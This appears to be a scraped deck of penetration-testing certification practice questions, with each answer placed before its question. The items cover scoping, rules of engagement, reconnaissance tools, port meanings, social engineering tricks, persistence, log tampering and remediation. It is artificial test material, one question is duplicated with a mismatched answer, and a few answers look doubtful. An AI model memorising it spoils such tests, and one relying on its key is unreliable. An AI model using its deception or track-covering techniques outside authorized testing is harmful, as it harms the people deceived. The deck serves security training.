You are defining the rules of engagement (ROE) for an upcoming penetration test. This will be a gray box assessment. This will be an internal test. What limitations might you expect to encounter as you conduct the assessment? (Choose two.)
Active Directory users Password policies defined within Group Policy
You are defining the rules of engagement (ROE) for an upcoming penetration test. This will be a white box assessment. This will be an internal test. No third parties may be involved. Which of the following resources could be considered in-scope for the assessment? (Choose two.)
They key management system they use to store encryption keys Their router configurations
You are defining the rules of engagement (ROE) for an upcoming penetration test. This will be a white box assessment. This will be an internal test. No third parties may be involved. Which of the following resources could be considered in-scope for the assessment? (Choose two.)
Nothing. The ROE has been defined appropriately.
You are defining the rules of engagement (ROE) for an upcoming penetration test. This will be a white box assessment. You have specified that the target may not employ shunning or blacklisting during the test. You have specified that the target must provide you with internal access to the network, a network map, and authentication credentials. You have also specified that applications provided by a SaaS service provider are off-limits during the test. What did you do incorrectly in this scenario?
The target organization The SaaS service provider
You are defining the rules of engagement (ROE) for an upcoming penetration test. This will be a white box assessment. You have specified that the target may not employ shunning or blacklisting during the test. You have specified that the target must provide you with internal access to the network, a network map, and authentication credentials. You have also specified that applications provided by a SaaS service provider will be in-scope during the test. From whom do you need written authorization to perform this test? (Choose two.)
Clearly defined problem escalation procedures Acknowledgment that penetration testing carries inherent risks
You are defining the rules of engagement (ROE) for an upcoming penetration test. You are working on the problem resolution section of the document. Which elements should be included in this section? (Choose two.)
Wireless SSIDs used by the client IP address ranges used on the client's internal network
You are defining the scope of an upcoming penetration test. Your client's offices are located in a large office complex with many other tenants. The client has asked you to include the organization's network in the test. Which parameters should be identified as in-scope? (Choose two.)
Using smart cards and PINs
You are discussing multifactor authentication with a client. The client asks you for an example of what multifactor authentication is. What do you tell the client as to what would meet requirements of multifactor authentication?
How you will communicate the results of the test with the target A list of behaviors that are not allowed on the part of the target during the test
You are documenting the rules of engagement (ROE) for an upcoming penetration test. Which elements should be considered? (Choose two.)
A list of out-of-scope systems A list of in-scope systems
You are documenting the rules of engagement (ROE) for an upcoming penetration test. Which elements should you make sure to include? (Choose two.)
Conclusion
You are generating a written report of findings after a penetration test. Based on the results of the test, you have created a list of recommendations you feel the client should focus on. Where should you include your recommendations in the report?
Conclusion
You are generating a written report of findings after a penetration test. Based on the sheer number of vulnerabilities you discovered in the test, you feel that the client should undergo a follow-up penetration test within the next three months to verify that the issues have been remediated. Where should you include this recommendation in the report?
Findings and remediation
You are generating a written report of findings after a penetration test. During the test, you discovered that many older Windows workstations in the network haven't been patched properly and are susceptible to the WannaCry ransomware. To fix this, the client needs to install the MS17-010 - Critical update from Microsoft. Where should you include this recommendation in your report?
Findings and remediation
You are generating a written report of findings after a penetration test. During the test, you discovered that many older Windows workstations in the network haven't been patched properly and are susceptible to the WannaCry ransomware. Where should you include this information in your report?
Methodology
You are generating a written report of findings after a penetration test. During the test, you followed the NIST 800-115 standard. In which section of the report should you include this information?
Methodology
You are generating a written report of findings after a penetration test. During the test, you followed the specifications of the EC-Council for its Certified Ethical Hacker (CEH) certification. Where should this information be included in your report?
Findings and remediation
You are generating a written report of findings after a penetration test. In which section of the report should you consider the risk appetite of the client when deciding which information to include?
Executive summary
You are generating a written report of findings after a penetration test. In which section of the report should you provide the reader with a high-level synopsis of the test and the results?
Metrics and measures
You are generating a written report of findings after a penetration test. In which section should you report risk ratings?
Metrics and measures
You are generating a written report of findings after a penetration test. You cross-reference each vulnerability you found in the test against the Common Vulnerabilities and Exposures (CVE) database to assign it a qualitative risk rating of Low, Medium, High, or Critical. Where should these risk ratings be included in the report?
whois recon-ng
You are in the information gathering stage of a black box penetration test. Which tools could you use to footprint the target organization using OSINT? (Choose two.)
Job postings on the organization's website Résumés of current employees on LinkedIn
You are in the information gathering stage of a black box penetration test. You need to footprint the target organization by determining what type of network infrastructure they use. Which OSINT sources could potentially reveal this information? (Choose two.)
Should the test be conducted on-site or from an off-site location?
You are in the initial stages of scoping a gray box penetration test with a new client. What is a question you should ask to better define the project scope?
Risk acceptance
You are meeting with a new client to scope out the parameters of a future penetration test. During the course of the discussion, you ask the client if they are willing to accept the fact that a penetration test could cause service disruptions within their organization. The client responds affirmatively. What process has occurred in this scenario?
Client acceptance
You are meeting with your client after a penetration test is complete. At the conclusion of the meeting, you ask the client to agree in writing that you have fulfilled your responsibilities according to the contract you initially signed with the client. What is this process called?
Attestation of findings
You are meeting with your client after a penetration test is complete. During the meeting, you provide the client with detailed evidence related to the issues you discovered during the test. What is this process called?
Future technological changes could expose new vulnerabilities that are currently unknown.
You are negotiating an upcoming penetration test with a new client. In the agreement, you have included language that specifies that the results of the test are valid only at the point in time when the test was performed. Why is this language in the agreement?
The rules of engagement and the type of assessment used could preclude some vulnerability from being discovered.
You are negotiating an upcoming penetration test with a new client. In the agreement, you have included language that specifies that the scope and methodology requested by the client can impact the comprehensiveness of the test. Why is this language in the agreement?
White box
You are negotiating an upcoming penetration test with a new client. They have requested that you perform a "full knowledge" test of their network. Which type of penetration test should you perform?
From within the internal network From a location outside the organization's firewall
You are performing a PCI-DSS compliance penetration test for a client. With respect to network topology, how should you run your vulnerability scans during this test? (Choose two.)
Conduct a spear phishing exploit to trick an internal user into revealing his or her credentials.
You are performing a black box penetration test for a client. The rules of engagement call for you to perform a credentialed vulnerability scan, but you haven't been given administrative logon information. What could you do?
Restrict the vulnerability scan to just those protocols commonly used on web servers.
You are performing a black box penetration test for a client. The rules of engagement call for you to perform a vulnerability scan on the organization's many public-facing web servers. You have been allotted only a few hours in the test scope to perform the scans. What should you do?
Impersonation
You are performing a black box penetration test for a large financial organization. Using reconnaissance techniques, you have identified the vendor that services the vending machines within the organization's main headquarters. You dress in a similar uniform as the vendor's employees. You also purchase a hand truck and several cases of soda pop. The receptionist of the target organization allows you to enter and directs you to the break room. What kind of exploit did you use in this scenario?
Fingerprinting Organizations with Collected Archives (FOCA)
You are performing a black box penetration test for a large financial organization. You want to search the Internet for any documents associated with the organization (such as Microsoft Word or PowerPoint documents) and analyze each file's metadata for useful information. Which tool in your penetration testing toolkit could you use to do this?
Censys
You are performing a black box penetration test for a large organization that wholesales imported electronic devices in the United States. You need to probe the organization's web server IP address to see what information is associated with it, such as the version of SSL or TLS and the cipher suite that it uses. Which tool in your penetration testing toolkit could you use to do this?
Censys whois recon-ng Shodan
You are performing a black box penetration test for a large organization that wholesales imported electronic devices in the United States. You need to uncover any information you can find about the organization using open source intelligence (OSINT). Which tool in your penetration testing toolkit could you use to do this?
Impersonation Elicitation
You are performing a black box penetration test for a medium-sized manufacturing organization. Using reconnaissance and phishing techniques, you have compromised the password for an employee's email account. You use this account to question other employees in an attempt to gather sensitive information and documents. Which exploits did you use in this scenario? (Choose two.)
Impersonation Elicitation
You are performing a black box penetration test for a medium-sized manufacturing organization. Using reconnaissance techniques, you have identified the vendor that services the printers within the organization's headquarters. You dress in a similar uniform as that vendor's employees. You also purchase a toolkit containing tools commonly used by printer repair technicians. The receptionist of the target organization allows you to enter and directs you to a troublesome printer. While "working" on that printer, you chat with nearby employees to gather information. Which exploits did you use in this scenario? (Choose two.)
Shoulder surfing Impersonation
You are performing a black box penetration test for a medium-sized manufacturing organization. Using reconnaissance techniques, you have identified the vendor that services the printers within the organization's headquarters. You dress in a similar uniform as that vendor's employees. You also purchase a toolkit containing tools commonly used by printer repair technicians. The receptionist of the target organization allows you to enter and directs you to a troublesome printer. While "working" within the organization, you discretely watch employees as they type, trying to gather sensitive information. Which exploits did you use in this scenario? (Choose two.)
nslookup
You are performing a black box penetration test for a medium-sized organization that sells imported clothing through its online storefront. You need to discover which IP addresses are associated with the organization's domain. Which tool in your penetration testing toolkit should you use?
theHarvester
You are performing a black box penetration test for a medium-sized organization that sells imported clothing through its online storefront. You want to query search engines and other resources to discover email addresses, employee names, and other details about the target. Which tool in your penetration testing toolkit should you use?
Smishing
You are performing a black box penetration test for a medium-sized organization that sells imported clothing. You have used reconnaissance techniques to identify a key software developer. You send this employee a personalized text message containing a Bitly URL that points to your own website where you capture information to a text file. What kind of exploit did you use in this scenario?
whois
You are performing a black box penetration test for a medium-sized organization that sells imported motorcycles and ATVs through its online storefront. You need to discover who owns the organization's domain. Which tool in your penetration testing toolkit should you use?
Whaling
You are performing a black box penetration test for a medium-sized organization. You have used reconnaissance techniques to identify the CEO's email address as well as the email address belonging to a help desk employee. You craft an email to the CEO that appears to come from the help desk employee directing the CEO to reset her password. When she clicks the link provided in the email, she is redirected to your own website where her credentials are captured to a text file. What kind of exploit did you use?
Vishing
You are performing a black box penetration test for a small organization that wholesales imported electronic devices in the United States. You have used reconnaissance techniques to identify a receptionist's phone number as well as the organization's printer vendor. You call this receptionist, pretending to be a sales rep from the vendor. You ask the receptionist for information about their printers, workstations, operating systems, and so on, to learn more about the organization's network infrastructure. What kind of exploit did you use in this scenario?
Isolate the POS devices on their own subnet that doesn't have Internet connectivity. Upgrade the POS devices to a newer version.
You are performing a black box penetration test for a small retail chain. When you enumerate one of their retail locations, you discover that their point-of-sale (POS) systems are connected directly to the Internet. When you footprint them, they appear to be running Windows XP SP3. You visit one of their retail locations and notice that the POS systems are connected to the network using a wired connection and are attached to the counter with a cable lock. What should you recommend in your final report to the client? (Choose two.)
Deception Social engineering
You are performing a black box penetration test. After gaining access to the internal network and running a vulnerability scan, you've identified a target system and mapped its vulnerabilities to a specific exploit. However, to execute the exploit, you need physical access to an internal network jack. So, you tailgate your way into the facility, plug in your laptop, and run the exploit. What technique did you use in this scenario? (Choose two.)
The scanner generated a false positive.
You are performing a black box penetration test. You are adjudicating the results of a vulnerability scan. Upon further inspection, you discover that one of the most serious vulnerabilities identified on the target organization's web server by the scanner doesn't actually exist. Which of the following could explain what has happened?
Conduct a phishing exploit. Enumerate internal user accounts.
You are performing a black box penetration test. You have used theHarvester to enumerate a large number of user email addresses in the target organization. What could you do with this information? (Choose two.)
Use the -T2 option with the nmap command.
You are performing a black box penetration test. You need to run a vulnerability scan using nmap from an external network location outside the organization's firewall. The organization uses a low-bandwidth T1 line to connect to the Internet. How should you configure the scan?
Send deauth frames to deauthenticate wireless clients. Reconnect wireless clients to an access point with the same SSID as the target organization.
You are performing a black box penetration test. You want to perform an evil twin attack to capture wireless user data. Which of the following tasks would you need to complete? (Choose two.)
A domain controller is running on an older version of Window Server and is missing several critical security updates. A database server is vulnerable to the WannaCry exploit.
You are performing a gray box penetration test and have just finished running your vulnerability scans, categorizing the results, and adjudicating the data. Now you need to prioritize the vulnerabilities prior to moving to the next phase of the test. Which of the following would likely constitute the highest priority vulnerabilities to exploit? (Choose two.)
Debug the application's executable.
You are performing a gray box penetration test for a client. The employees in the target organization use an application that was developed in-house to complete their day-to-day work. It crashes frequently, and you suspect that it is based on poorly written or outdated code. You want to analyze the application's execution when run by a typical end user to see whether it contains weaknesses that can be exploited. What should you do?
Decompile the application's executable.
You are performing a gray box penetration test for a client. The employees in the target organization use an application that was developed in-house to complete their day-to-day work. It crashes frequently, and you suspect that it is based on poorly written or outdated code. You want to analyze the application's source code to see whether it contains weaknesses that can be exploited. However, the rules of engagement for the test do not allow access to the code. What should you do?
Decompilers usually produce assembly-level code.
You are performing a gray box penetration test for a client. You want to target an in-house application that the organization's employees use daily. To identify weaknesses in the code, you decide to decompile the application's executable. You have some experience programming in C++, so you feel comfortable reviewing the source code revealed by the decompile process. However, after decompiling, you find that you don't understand the contents of the source code file produced. Why did this happen?
Spear phishing
You are performing a gray box penetration test for a medium-sized organization. You have used reconnaissance techniques to identify a help desk employee and a payroll employee. You craft an email to the payroll employee that appears to come from the help desk employee directing the payroll employee to reset her password. When she clicks the link provided in the email, she is redirected to your own website where her credentials are captured to a text file. What kind of exploit did you use?
CVE Full Disclosure NVD
You are performing a gray box penetration test. During the enumeration and fingerprinting process, you discovered that an internal website on the target organization's network runs on a very old version of IIS. You need to see whether there are any vulnerabilities associated with this older web server that you may be able exploit. Which open source research source could you use?
Switch spoofing
You are performing a gray box penetration test. To capture information from multiple VLANs, you have configured the network board in your computer to emulate a trunk port on a network switch. Your goal is to get the real switch to forward traffic from all VLANs to your device. What is this exploit called?
They can be fooled with fake fingerprints.
You are performing a gray box penetration test. While on-site, you notice that all employees use USB fingerprint biometric scanners to authenticate to their systems. What is the security weakness associated with this type of authentication system?
The IDS will detect the stealth scan.
You are performing a gray box penetration test. You are performing a vulnerability scan on the internal network using a stealth scan. The target network has an IDS device installed. What is likely to happen?
By operating system By asset value By number of vulnerabilities found By vulnerability severity
You are performing a gray box penetration test. You have just finished running extensive vulnerability scans on all of the hosts on the target network. You now need to categorize all of the devices that were scanned. Which of the following is a valid way to perform asset categorization?
Create a backdoor. Create a user account.
You are performing a gray box penetration test. You have successfully compromised a target computer system. What techniques could you employ to ensure persistence? (Choose two.)
Hide any files that you copied to the system. Alter log entries created when you compromised the system.
You are performing a gray box penetration test. You have successfully compromised a target computer system. You now need to cover your tracks to hide the evidence of your actions. Which techniques could you employ? (Choose two.)
Use the -T2 option with the nmap command.
You are performing a gray box penetration test. You need to run a vulnerability scan on a fragile internal server system? How should you configure the scan?
It is probably a web server.
You are performing a gray box penetration test. You run a vulnerability scan of a host and find that TCP ports 8080 and 8443 are open. What can you infer about this host from this information?
hping
You are performing a gray box penetration test. You want to craft a custom packet to test how a server responds and to see what information it responds with. Which utility could you use to do this?
telnet 10.0.0.1 80
You are performing a gray box penetration test. You want to use the Telnet client on your Linux laptop to grab the banner of a web server on the target's network. The target web server has an IP address of 10.0.0.1. Which command would you use at the shell prompt to do this?
The scanning host responds to the target host with an RST packet.
You are performing a vulnerability scan during a gray box penetration test. The scanner manipulates the TCP three-way handshake to enumerate network hosts. First, the scanner sends a SYN packet to the target host. The host responds with a SYN-ACK packet to the scanning host. What happens next?
Stealth
You are performing a vulnerability scan during a gray box penetration test. The scanner manipulates the TCP three-way handshake to enumerate network hosts. Which type of scan are you performing?
The client's network access control (NAC) system has quarantined your laptop on a remediation network.
You are performing a white box penetration test for a client. You arrive at the client's site and plug your laptop into an open network jack. However, your laptop receives only limited connectivity on the client's network. You run the ipconfig command and notice that your laptop has received an IP address, but you can see only one other host on the network. Why did this happen?
Elicitation
You are performing reconnaissance as a part of a black box penetration test. You notice that the employees of the target organization commonly congregate at a particular outdoor restaurant for lunch. You begin frequenting the same restaurant for lunch and make friends with several of the target organization's employees. After you gain their trust, they begin to share information about their jobs, computers, bosses, customers, projects, and so on. What type of exploit occurred in this scenario?
Likeness
You are performing reconnaissance as a part of a black box penetration test. You notice that the employees of the target organization commonly congregate at a particular outdoor restaurant for lunch. You hire several young, physically attractive consultants to help with the penetration test. You send them to the same restaurant for lunch and have them make friends with several of the target organization's employees. They gain the employees' trust, and the employees begin to share information about their jobs, computers, bosses, customers, projects, and so on. Which motivation factor was used in this scenario?
It is an FTP server.
You are performing reconnaissance as part of a black box penetration test. You run a vulnerability scan on one of the target organization's public-facing servers and discover that port 20 is open. What does this indicate?
It is an SMTP server.
You are performing reconnaissance as part of a black box penetration test. You run a vulnerability scan on one of the target organization's public-facing servers and discover that port 25 is open. What does this indicate?
It is an SMB file server.
You are performing reconnaissance as part of a gray box penetration test. You run a vulnerability scan on one of the target organization's internal servers and discover that port 445 is open. What does this indicate?
It is an IMAP email server.
You are performing reconnaissance as part of a gray box penetration test. You run a vulnerability scan on one of the target organization's servers and discover that port 143 is open. What does this indicate?
It is an SSH server.
You are performing reconnaissance as part of a gray box penetration test. You run a vulnerability scan on one of the target organization's servers and discover that port 22 is open. What does this indicate?
It is a Telnet server.
You are performing reconnaissance as part of a gray box penetration test. You run a vulnerability scan on one of the target organization's servers and discover that port 23 is open. What does this indicate?
It is a DNS server.
You are performing reconnaissance as part of a gray box penetration test. You run a vulnerability scan on one of the target organization's servers and discover that port 53 is open. What does this indicate?
It is a TFTP server.
You are performing reconnaissance as part of a gray box penetration test. You run a vulnerability scan on one of the target organization's servers and discover that port 69 is open. What does this indicate?
It is an LDAP server.
You are performing reconnaissance as part of a gray box penetration test. You run a vulnerability scan on one of the target organization's servers and discover that ports 389 and 636 are open. What does this indicate?
It is an HTTP server.
You are performing reconnaissance as part of a gray box penetration test. You run a vulnerability scan on one of the target organization's servers and discover that ports 80 and 443 are open. What does this indicate?
It is a domain controller.
You are performing reconnaissance as part of a gray box penetration test. You run a vulnerability scan on one of the target organization's servers and discover that several ports are open, including 88, 135, 139, 389, and 464. What does this indicate?
Why is the test being performed? Who is the target audience for the test?
You are performing research that will be used to define the scope of a penetration test that your company will perform for a client. What information must be included in your research? (Choose two.)
Scoping
You are planning on setting up a security assessment. Which of the following has a major impact on the budget of the assessment?
Scope creep
You are running a penetration test for a client. The original test calls for you to test the security of one of the client's remote branch offices. The client called today and indicated that they are concerned about the security readiness of a second branch office. They insisted that you expand the penetration test to include this second site. What process occurred in this scenario?
Your laptop's IP address got blacklisted.
You are running a penetration test for a client. You are using your penetration testing toolkit running on a personal laptop to conduct scans on various network infrastructure devices, including servers, routers, and switches. Suddenly, the network has gone dark. You can no longer access any devices on the client's network. Which of the following could explain what has happened?
Hosts Networks Domains
You are scanning your client's internal network as part of a white box penetration test. Your goal is to enumerate the network. What kind of information are you likely to include in the enumeration process?
User accounts Groups Shared network folders
You are scanning your client's internal network as part of a white box penetration test. Your goal is to enumerate the network. What kind of information are you likely to include in the enumeration process?
Web pages Applications Services Tokens
You are scanning your client's internal network as part of a white box penetration test. Your goal is to enumerate the network. What kind of information are you likely to include in the enumeration process?
None of the above.
You are scoping a black box penetration test for a client. The goal is to see whether you can gain access to sensitive financial data stored on an internal database server. What should the client do prior to starting the test?
Network diagrams
You are scoping a black box penetration test for a client. The goal is to see whether you can gain access to the information stored on an internal database server. Which information should the client provide you with prior to starting the test?
Any external location
You are scoping a black box penetration test. Where should the penetration testers be physically located?
Configure certificate pinning.
You are scoping a white box penetration test for a client. The client has implemented network access controls (NAC) with IPSec to prevent devices that are out of compliance with company policies from connecting to the secure internal network. Because you are conducting a white box test, your testers' systems need to bypass NAC and be granted direct access to internal secure network. What should the client do to accomplish this?
Network diagrams Facility maps
You are scoping a white box penetration test for a client. The goal is to see whether you can gain access to confidential customer data stored on an internal database server. You have asked the client for architectural diagrams. Which information should the client provide you with? (Choose two.)
An in-house developed desktop application used to access the information stored in the database An in-house developed web application used to generate reports using the information stored in the database
You are scoping a white box penetration test for a client. The goal is to see whether you can gain access to confidential research data stored on an internal database server. To facilitate this, you have requested that the client provide you with access to applications that end users use to generate sample application requests. Which specific applications should be included in the request? (Choose two.)
Architectural diagrams Sample requests XSD
You are scoping a white box penetration test for a client. The goal is to see whether you can gain access to confidential research data stored on an internal database server. You want to target an internally developed data collection application that the client's end users use on a daily basis to catalog and store information in the database. Which information should the client provide you with prior to starting the test?
Configuration files Data flow diagrams Software development kit (SDK) documentation
You are scoping a white box penetration test for a client. The goal is to see whether you can gain access to confidential research data stored on an internal database server. You want to target an internally developed data collection application that the client's end users use on a daily basis to catalog and store information in the database. Which information should the client provide you with prior to starting the test?
Whitelist the testers' user accounts in their intrusion protection system (IPS). Configure security exceptions that allow the penetration testers' systems to bypass network access controls (NAC).
You are scoping a white box penetration test for a client. The goal is to see whether you can gain access to sensitive patient data stored on an internal database server. What should the client do prior to starting the test? (Choose two.)
Conduct an impact analysis with the new client and determine their tolerance to impact.
You are scoping an upcoming external black box penetration test for the client. One of your penetration testers has developed a vulnerability scanner that is very aggressive. In fact, in a previous test, her scanner brought down the client's customer-facing website for almost 30 minutes. However, by doing so, that client was able to learn a great deal about several vulnerabilities in their web application software. What should you do for the current client?
Should the test focus on a specific known vulnerability? Should the test look for unknown vulnerabilities?
You are scoping an upcoming external black box penetration test for the client. You are trying to determine what will be included in the test and what won't. Which of the following questions should you ask the client? (Choose two.)
A list of systems that are off-limits to testing
You are scoping an upcoming penetration test. You need to identify the technical constraints associated with the test. What should be included in this part of the scope documentation?
Certificate pinning
You are scoping an upcoming white box penetration test with a new client. Their network employs network access control (NAC) using IPSec. Which technique will your penetration testers need to use to enable them to access the secure internal network protected by NAC?
They are less biased than an internal team. They have the independence required to perform a thorough test.
You are the CIO for a mid-sized corporation. You are putting together a plan to implement regular penetration tests and are considering using an external penetration testing contractor. Which of the following are benefits of using an external team? (Choose two.)
There is a potential conflict of interest if they also perform testing for one of your competitors. They are usually more expensive than an internal team.
You are the CIO for a mid-sized corporation. You are putting together a plan to implement regular penetration tests and are considering using an external penetration testing contractor. Which of the following are disadvantages of using an external team? (Choose two.)
They have contextual knowledge of the organization. It's usually less expensive than using an external contractor.
You are the CIO for a mid-sized corporation. You are putting together a plan to implement regular penetration tests and are considering using an internal penetration testing team consisting of your own employees. Which of the following are benefits of using an internal team? (Choose two.)
They may feel that a vulnerability discovered may reflect poorly on them. They may lack objectivity.
You are the CIO for a mid-sized corporation. You are putting together a plan to implement regular penetration tests and are considering using an internal penetration testing team consisting of your own employees. Which of the following are disadvantages of using an internal team? (Choose two.)
Banner grabbing
You are using a Telnet client to connect to a web server in an attempt to fingerprint what type and version of web server software is running on it. What is this process called?
Search fields that echo a search string back to the user HTTP headers Input fields that echo user data
You can find XSS vulnerabilities in which of the following?
Information gathering and vulnerability identification
You have been asked to perform a black box penetration test for a medium-sized organization that sells imported motorcycles and ATVs online. In which phase of this assessment will you likely spend most of your time?
Master services agreement (MSA)
You have been asked to perform a penetration test for a client. You need a document that will set the overall terms between the two organizations. This will also be used for future work between your organizations as you plan on setting up a support agreement. What is this document called?
Nondisclosure agreement (NDA)
You have been asked to perform a penetration test for a client. You need a legal document that is used to protect the confidentiality of the client's data and other information that you may encounter. What is this legal document called?
Identify the scope of the test.
You have been asked to perform a penetration test for a medium-sized organization that sells after-market motorcycle parts online. What is the first task you should complete?
Third-party authorization
You have been asked to perform a penetration test on a large, complex IT infrastructure. Some of the scope may include contents found on a cloud network hosted by a cloud provider. What will be needed to perform this type of testing?
Scope creep
You have been contracted to perform a penetration test for an organization. The initial meetings went well, and you have well-defined rules of engagement (ROE) and target-scoping documents. Two weeks later, you are asked if you can "squeeze in another /22 subnet" for the given assessment time frame. This is a potential example of:
As soon as you start collecting data in testing phases
You have been hired to complete a penetration test for a large company. The scoping for the engagement has been completed, and you have begun your testing phases. At what point should you start writing the report?
USB key drop
You have been hired to conduct a black box penetration test for a client. You purchase a small flash drive and load it with malware that installs a keylogger on the victim's computer and sends the information it captures to you. You walk in the client's front door and ask the receptionist for directions to a nearby sports venue. While you are speaking, you deliberately drop the drive on the floor and then leave. Which exploit was used in this scenario?
Impersonation USB key drop
You have been hired to conduct a black box penetration test for a client. You purchase a small flash drive and load it with malware that sends information to you. Using reconnaissance techniques, you have identified the vendor that services the heating and air conditioning within the organization's headquarters. You dress in a similar uniform as that vendor's employees and purchase the tools they commonly use. The receptionist of the target organization allows you to enter and directs you to the mechanical room. You deliberately leave the flash drive on a user's chair as you walk by an open cubicle. Which exploits were used in this scenario? (Choose two.)
Shoulder surfing
You have been hired to conduct a black box penetration test for a client. You walk into the organization's main entrance and ask the receptionist for information about current job openings. You watch the keystrokes she types on her computer in hopes of capturing sensitive information that you can use to gain access to the internal network. What kind of exploit was used in this scenario?
Dumpster diving theHarvester
You have been hired to conduct a black box penetration test for a client. You want to use a spear phishing attack to expose the authentication credentials used by key employees of the organization. Which tools or techniques could you use to gather the information needed to conduct this attack? (Choose two.)
Press releases Executive bios
You have been hired to conduct a black box penetration test for a client. You want to use a whaling attack to expose the authentication credentials used by the organization's leadership. What information could you use to do this? (Choose two.)
Shoulder surfing Business email compromise
You have been hired to conduct a gray box penetration test for a client. You managed to walk by just as she was logging on to her email account and watch the keystrokes she typed on her computer. Later that evening, after the employee has gone home for the day, you log on to her email account and send requests for information to other employees. Which exploits were used in this scenario? (Choose two.)
Nondisclosure agreement (NDA) Noncompete agreement
You have been recently hired by a security firm to conduct penetration tests on clients. Which agreements will your new employer most likely ask you to sign as a condition of employment? (Choose two.)
Local Administrator Password Solution (LAPS)
You have conducted a penetration test and are reviewing the results. You notice that the organization uses the same local administrator password on all of the systems. What tool can you use to help resolve this issue?
nmap -iL /root/targets.txt
You have created a list of target hosts that you want to scan with nmap and saved it to a text file named /root/targets.txt. Which command should you use to run the scan using this file?
An identified remote code execution vulnerability for which exploit code is publicly available in a web app exposed to the Internet.
You have identified multiple vulnerabilities during a penetration test. Which of the following findings would be most likely to merit an escalation contact with the organization-provided point of contact outside of standard meetings?
No, the confidentiality of the findings was not maintained.
You have just completed a gray box penetration test for a client. You have written up your final report and delivered it to the client. You also made sure that all access granted to you by the client to conduct the test has been disabled. You write a blog article identifying the client and the results of the assessment and post it to ensure no one else makes the same security mistakes the client made. Did you terminate the penetration test properly?
Methodology
You have just completed a penetration test for a client and are now creating a written report of your findings. You need to make sure the reader understands that you followed the PCI DSS standard while conducting the test. In which part of the report should you include this information?
Normalization of data
You have just completed a penetration test for a client. During the test, you used a variety of different tools to collect data and conduct exploits. Now you need to aggregate all of the data generated by these tools into a format that is consistent, correlated, and readable. What is this process called?
Exploit chaining
You have just completed scanning a target network and are now prioritizing activities in preparation to exploit the vulnerabilities found. The system you want to target can't be compromised with a single exploit. However, you determine that you can use multiple exploits in conjunction with each other to compromise the system. The first one gets through the system's host-based firewall. The second exploits a user account with weak password. The third elevates privileges on the system. What is your solution called?
Write the code in C on your Linux system. Cross-compile the code.
You have just completed scanning a target network and are now prioritizing activities in preparation to exploit the vulnerabilities found. You discover that organization still uses several older Windows Server 2003 systems that have not been properly updated and are vulnerable to a particular exploit. You decide to write a small program that will take advantage of this exploit. However, you use Kali Linux almost exclusively. What should you do to write a Windows program? (Choose two.)
Exploit modification Mapping vulnerabilities to potential exploits
You have just completed scanning a target network and are now prioritizing activities in preparation to exploit the vulnerabilities found. You discover that the organization still uses several older unsupported Windows 2000 Server systems. After performing some research, you identify several vulnerabilities associated with these systems that could be exploited. You modify the source code for a particular exploit such that it will work on these older systems and then you compile it. What are the processes you used in this scenario called? (Choose two.)
Test the modified exploit on virtual machines in a lab environment.
You have just completed scanning a target network and are now prioritizing activities in preparation to exploit the vulnerabilities found. You discover that the organization still uses several older unsupported Windows 2000 Server systems. After performing some research, you identify several vulnerabilities associated with these systems that could be exploited. You modify the source code for a particular exploit such that it will work on these older systems, and then you compile it. What should you do next?
Use directional antennae on all access points. Disable DHCP on the wireless network.
You have just concluded a black box penetration test for a client. During the test, you were able to access the organization's wireless network from the parking lot using your laptop running Aircrack-ng. In your final report, what should you recommend the client do to remediate this issue? (Choose two.)
Implement MAC address filtering. Implement 802.1x authentication.
You have just concluded a black box penetration test for a client. The organization's wireless network uses preshared keys. During the test, you were able to access the organization's wireless network from the parking lot using your laptop running Aircrack-ng. In your final report, what should you recommend the client do to remediate this issue? (Choose two.)
Change the default administrative username and password on the controller.
You have just concluded a gray box penetration test for a client. During the test, you were able to access the organization's wireless network controller device using a default administrator username and password. In your final report, what should you recommend the client do to remediate this issue?
Use FTPS for file transfers.
You have just concluded a penetration test for a client that has many remote sites. Employees at the remote sites commonly use an FTP client to copy files back and forth between their site and the home office servers. During the test, you were able to sniff these FTP sessions and capture sensitive information. In your final report, what should you recommend the client do to remediate this issue?
Technological
You have just concluded a penetration test for a client that makes extensive use of work-at-home employees. The employees use a VPN connection. During the test, you were able to use social engineering to compromise an employee's VPN connection and gain access to the internal network. As a mitigation strategy, you recommend that the client implement multifactor authentication for all VPN connections. What type of solution is this?
passwd
You have just concluded a penetration test for a client that uses a large number of temporary workers and contractors. In your findings, you report that temporary and contract user accounts are frequently not deactivated or removed when their work is complete because they frequently come back to work on new projects several months later. Given that the client uses Linux desktops and servers, which of the following Linux commands should you recommend they use to manually lock temporary or contract user accounts until the worker returns for a new project?
chage
You have just concluded a penetration test for a client that uses a large number of temporary workers and contractors. In your findings, you report that temporary and contract user accounts are frequently not deactivated or removed when their works is complete. Given that the client user Linux desktops and servers, which of the following Linux commands should you recommend they use to automatically lock user accounts after a certain time?
Use the scp command for file transfers.
You have just concluded a penetration test for a client. During the test, you discovered that one of Linux system administrators uses rcp to copy files between Linux servers. In your final report, what should you recommend the client do to remediate this issue?
Use SSH for remote server access.
You have just concluded a penetration test for a client. During the test, you discovered that one of the Linux system administrators uses Telnet to remotely access Linux servers. In your final report, what should you recommend the client do to remediate this issue?
People
You have just concluded a penetration test for a client. During the test, you discovered that system administrators were using unencrypted Telnet sessions to remotely manage sensitive servers. You were able to sniff network traffic and capture administrative credentials from these connections. To address this vulnerability, you recommend that the client require all IT staff to pass a network security certification exam. What type of solution is this?
Process
You have just concluded a penetration test for a client. During the test, you discovered that the organization's employees made extensive use of a shared Google Drive account to collaborate. You were able to use a social engineering exploit to get access to the shared account and access sensitive files. To address this vulnerability, you recommend that the client disallow this practice among employees. What type of solution is this?
Technological
You have just concluded a penetration test for a client. During the test, you were able to gain access to the client's physical facility by tailgating with a group of employees. To address this vulnerability, you recommend that the client implement a man-trap locking door at the entrance to the facility. What type of solution is this?
Technological
You have just concluded a penetration test for a client. During the test, you were able to gain access to the client's wireless network using Aircrack-ng while sitting in your car in a parking lot across the street. To address this vulnerability, you recommend that the client implement directional wireless network antennas and also manipulate the power level of the access points to prevent signal emanation. What type of solution is this?
Run the enable secret command on the router. Implement procedures to vet representatives from vendors.
You have just concluded a penetration test for a client. During the test, you were able to gain access to the server room by masquerading as a technician from an IT vendor. You were able to plug your laptop into the serial connector on the organization's Cisco router and access its configuration. In your final report, what should you recommend the client do to remediate this issue? (Choose two.)
Technological
You have just concluded a penetration test for a client. During the test, you were able to use John the Ripper to brute force an administrative password on a sensitive Windows file server. To address this vulnerability, you recommend that the client implement Group Policy settings that require complex passwords as well as lock the system after three incorrect logon attempts. What type of solution is this?
People
You have just concluded a penetration test for a client. During the test, you were able to use a phishing exploit to collect authentication credentials from several employees. To address this vulnerability, you recommend that the client conduct a mandatory security awareness training session for all employees. What type of solution is this?
People
